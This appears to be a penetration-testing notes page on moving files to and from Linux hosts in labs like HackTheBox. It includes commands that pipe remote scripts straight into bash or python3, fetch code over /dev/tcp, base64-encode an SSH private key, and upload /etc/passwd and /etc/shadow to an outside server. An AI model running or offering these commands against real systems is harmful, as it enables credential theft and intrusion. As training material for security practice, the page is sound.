DiscordHackTheBoxTryHackMeGitHub

Linux

Linux File Transfers

Base64 Encode & Decode

  1. Check MD5 Hash

md5sum id_rsa

  1. Encode SSH Key to Base64

cat id_rsa |base64 -w 0;echo

  1. Decode the File

echo -n 'justimaginethisissomerandomhashbecauseyoudontcareandidontcare=` | base64 -d > id_rsa

Web Downloads with Wget and cURL

  1. Download a File Using wget

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

  1. Download a File Using cURL

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Web Upload

Mechanism is similar to Windows web upload using uploadserver module:

sudo python3 -m pip install --user uploadserver

Secure HTTPS Web Server

  1. Start Web Server

sudo python3 -m pip install --user uploadserver

  1. Create a Self-Signed Certificate

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

  1. Start Web Server

mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate /root/server.pem

  • Upload Multiple Files

curl -X POST https://13.13.13.13/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Alternative File Transfer Method

  • Creating a Web Server with Python3

python3 -m http.server

  • Creating a Web Server with Python2.7

python2.7 -m SimpleHTTPServer

  • Creating a Web Server with PHP

php -S 0.0.0.0:8000

  • Creating a Web Server with Ruby

ruby -run -ehttpd . -p8000

Fileless Attacks Using Linux

  1. Fileless Download with cURL

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

  1. Fileless Download with wget

 wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Download with Bash(/dev/tcp)

  1. Connect to the Target Webserver

exec 3<>/dev/tcp/13.13.13.13/80

  1. HTTP GET Request

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

  1. Print the Response

cat <&3

SCP Download

SSH is a protocol that allows secure access to remote computers. And we could use SCP utility which uses SSH protocol for transferring files

  1. Enabling the SSH Server

sudo systemctl enable ssh

  1. Starting the SSH Server

sudo systemctl start ssh

  1. Checking for SSH Listening Port

netstat -lnpt

  1. Linux - Downloading Files Using SCP

scp plaintext@192.168.49.128:/root/myroot.txt .

SCP Upload

  • File Upload with SCP

scp /etc/passwd plaintext@192.168.49.128:/home/plaintext/
PreviousWindowsNextCode

Last updated